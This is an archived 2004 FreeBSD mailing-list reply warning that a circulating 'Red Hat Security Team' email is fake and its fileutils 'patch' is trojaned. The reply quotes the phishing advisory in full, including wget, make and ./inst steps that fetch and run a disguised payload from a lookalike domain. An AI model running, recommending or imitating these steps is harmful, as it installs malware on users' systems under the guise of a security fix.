From owner-freebsd-questions@FreeBSD.ORG Sun Oct 24 23:47:40 2004 Return-Path: Delivered-To: freebsd-questions@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6845716A4CE for ; Sun, 24 Oct 2004 23:47:40 +0000 (GMT) Received: from mail.revolutionsp.com (ganymede.revolutionsp.com [64.246.0.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2804A43D1F for ; Sun, 24 Oct 2004 23:47:40 +0000 (GMT) (envelope-from klr@6s-gaming.com) Received: from mail.revolutionsp.com (localhost [127.0.0.1]) by mail.revolutionsp.com (Postfix) with ESMTP id DA4B615CE9 for ; Sun, 24 Oct 2004 20:44:14 +0000 (GMT) Received: from 81.84.174.8 (SquirrelMail authenticated user klr@6s-gaming.com); by mail.revolutionsp.com with HTTP; Sun, 24 Oct 2004 20:44:14 -0000 (GMT) Message-ID: <60476.81.84.174.8.1098650654.squirrel@81.84.174.8> In-Reply-To: <200410242157.i9OLvRRt011248@2ens11.uta.edu> References: <200410242157.i9OLvRRt011248@2ens11.uta.edu> Date: Sun, 24 Oct 2004 20:44:14 -0000 (GMT) From: "Hugo Silva" To: freebsd-questions@freebsd.org User-Agent: SquirrelMail/1.4.3a X-Mailer: SquirrelMail/1.4.3a MIME-Version: 1.0 Content-Type: text/plain;charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) Importance: Normal Subject: Re: RedHat: Buffer Overflow in 'ls' and 'mkdir' X-BeenThere: freebsd-questions@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: User questions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 24 Oct 2004 23:47:40 -0000 This is a fake! DONT download the patch (linux users), it is a trojaned version. Check: http://www.linux.ie/pipermail/ilug/2004-October/019483.html > > [logo_rh_home.png] > > Original issue date: October 20, 2004 > Last revised: October 20, 2004 > Source: RedHat > > A complete revision history is at the end of this file. > > Dear RedHat user, > > Redhat found a vulnerability in fileutils (ls and mkdir), that could > allow a remote attacker to execute arbitrary code with root > privileges. Some of the affected linux distributions include RedHat > 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 > and not only. It is known that *BSD and Solaris platforms are NOT > affected. > > The RedHat Security Team strongly advises you to immediately apply the > fileutils-1.0.6 patch. This is a critical-critical update that you > must make by following these steps: > * First download the patch from the Security RedHat mirror: wget > www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz > * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz > * cd fileutils-1.0.6.patch > * make > * ./inst > > Again, please apply this patch as soon as possible or you risk your > system and others` to be compromised. > > Thank you for your prompt attention to this serious matter, > > RedHat Security Team. > > Copyright © 2004 Red Hat, Inc. All rights reserved. > _______________________________________________ > freebsd-questions@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-questions > To unsubscribe, send any mail to > "freebsd-questions-unsubscribe@freebsd.org" > -- www.6s-gaming.com